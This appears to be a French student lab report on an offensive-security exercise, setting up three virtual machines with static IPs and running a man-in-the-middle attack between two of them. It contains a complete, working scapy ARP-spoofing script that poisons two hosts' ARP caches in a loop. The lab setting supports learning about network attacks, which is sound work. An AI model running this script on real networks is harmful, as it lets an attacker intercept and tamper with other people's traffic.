﻿# TP5 : Sujet sécu offensive : MITM

## 0. Prérequis



➜ La VM de rocky linux déjà préconfigurée, prête a être clonée. 


## I. Définition des IP statiques
IP de l'adaptateur ethernet virutalbox : 10.3.1.1
Pour définir les ip statiques il faut modifier le fichier correspondant à l'interface : /etc/sysconfig/network-scripts
nano ifcfg-enp0s8
```
1ère VM
DEVICE=enp0s8
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.3.1.11
NETMASK=255.255.255.0

2ème VM
DEVICE=enp0s8
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.3.1.12
NETMASK=255.255.255.0

3ème VM
DEVICE=enp0s8
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.3.1.13
NETMASK=255.255.255.0
```

## II. Installation de scapy

Nous allons devoir utiliser un script permettant de spam les trames ARP permettant d'usurper un client.
```
pip install scapy
```
## III. Script ARP spoofing scapy

Voici le script scapy utilisé : 
```
import scapy.all as scapy
import time

interval = 4
ip_target = "10.3.1.11"
ip_gateway = "10.3.1.13"

def spoof(target_ip, spoof_ip):
    packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = scapy.getmacbyip(target_ip), psrc = spoof_ip)
    scapy.send(packet, verbose = False, iface = 'enp0s8')

def restore(destination_ip, source_ip):
    destination_mac = scapy.getmacbyip(destination_ip)
    source_mac = scapy.getmacbyip(source_ip)
    packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)
    scapy.send(packet, verbose = False, iface = 'enp0s8')

try:
    while True:
        spoof(ip_target, ip_gateway)
        spoof(ip_gateway, ip_target)
        time.sleep(interval)
except KeyboardInterrupt:
    restore(ip_gateway, ip_target)
    restore(ip_target, ip_gateway)
```
C'est un script trouvé sur internet mais qui copié collé ne fonctionne pas dans notre cas.
Afin de le faire fonctionné il suffit de rajouté iface = 'enp0s8' précisant qu'il faut agir sur l'interface enp0s8 et non sur l'une des autres.
Le script tourne sur la VM 2 (10.3.1.12)


